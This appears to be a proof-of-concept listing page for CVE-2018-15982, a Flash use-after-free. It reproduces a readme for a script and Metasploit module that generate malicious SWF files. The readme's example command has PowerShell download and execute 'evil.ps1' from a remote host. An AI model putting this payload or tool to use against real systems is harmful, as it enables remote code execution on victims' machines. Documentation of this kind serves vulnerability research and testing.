CVE-2018-15982 PoC — Adobe Flash Player 安全漏洞

Source

Associated Vulnerability

Description

Script and metasploit module for CVE-2018-15982

Readme

# Adobe Flash CVE-2018-15982

This script creates a swf payload for CVE-2018-15982, which is based off of the PoC from https://github.com/smgorelik/Windows-RCE-exploits.  The vulnerability was discovered by Chenming Xu and Ed Miles of Gigamon ATR.

The vulnerability is a use-after-free flaw enabling arbitrary code-execution in Flash.  More information can be found in the links below.

* https://threatpost.com/adobe-patches-zero-day-vulnerability-in-flash-player/139629/
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-15982

Note: Currently only spraying one block, I noticed this after I created the script.

Usage:

```python create_swf.py <command> <output file name>```

Example Usage:

```python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf```
  


Tested on: 
* Windows 10 Enterprise 10.0.17134, Internet Explorer 11.285.17134.0
* Adobe Flash 31.0.0.153, 29.0.0.140


## Example


Create payload:

![alt text](https://github.com/kphongagsorn/adobe-flash/blob/master/images/create.png)


Executing payload:

![alt text](https://github.com/kphongagsorn/adobe-flash/blob/master/images/exec31.png)

Confirm execution:

![alt text](https://github.com/kphongagsorn/adobe-flash/blob/master/images/confirm31.png)

## Metasploit Module

![alt text](https://github.com/kphongagsorn/adobe-flash/blob/master/images/metasploit-module.png)

File Snapshot

 [4.0K]  /data/pocs/a92e2479dd310d71ed76e903b95958393a375215
├── [ 46K]  create_swf.py
├── [4.0K]  images
│   ├── [3.8M]  confirm31.png
│   ├── [289K]  create.png
│   ├── [1.4M]  exec31.png
│   └── [1.2M]  metasploit-module.png
├── [4.0K]  metasploit_module
│   └── [ 47K]  adobe_flash_swf.rb
├── [1.4K]  README.md
└── [4.0K]  sample_files
    ├── [ 12K]  calctest.swf
    ├── [ 12K]  downloadtest.swf
    └── [ 12K]  notepadtest.swf

3 directories, 10 files

Remarks